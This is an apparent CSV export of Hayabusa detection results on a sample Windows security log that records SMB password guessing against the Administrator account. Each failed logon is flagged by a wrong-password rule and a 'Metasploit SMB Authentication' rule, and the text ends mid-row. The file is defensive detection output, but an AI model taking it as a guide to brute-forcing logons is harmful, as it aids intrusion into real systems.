Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJrVwcpABBaZ8cyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VcDw3I4BaFLdIeCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: egEpV9aAuCFjwx2I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th0ZLWF4YeOaNnkK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ahrOLfdy6DCQ9SfO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xiooSdP5eib8PUE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6nQ2jp9IGYnGeyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejMtyR5QNdJFhw1W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e50kO0aVhfw5np5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 176XyLw6IhEI6NuD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXCzCSSFvpbWNJFd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhHRuZYlH8hekaKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGIUBFRMQ3OBbOA0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7CTT5g1w58eRRlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmVccmad66uOK9ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t1jlT6kEcs14dcNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBty5jOGkkZSZEyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Ci7YUsO5MtFkDSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 12JToliq9mmAuMTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lw9AgAvBGWoXBlim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ReGDyvRpGknAKqqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6mdUn8na4asRfpJP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7Wm5p4HnNCbkyh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MQZwerVd6E08X8Ou : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbDjtLKoX5Q77bn5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O7BNKHiPjzJKCaDk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHqBI8bzZn5VO9gq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xz2ZO3b3QSh6Rdqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEfdhrwbTfCpCXKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kc0LuQzAmQTIF1X3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WMZ70YmzpVp2h8mY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FFVr3Amq6mA3umiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnN15vqZcww8pqTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSuMRF1txQ9g2Mwi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tUuapChhs4CGO1cS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIMr0hjIkwD8AaEG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ww9HMQX0cqmolYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJRRZ5e9lARVZDar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvUzVoSLqFPAXSWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SMMgPu1VJIjAWPDW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1JjIa4nOKDTLuAD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0J0GJIm1UUXHH9QJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVX3xIz0hrQFvPr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nv4tKFEmHjiXkVDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdHHJl9LBek9pIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MWofwwLjwiyBk39P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dvsHFZe7Z1uJ9Dkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 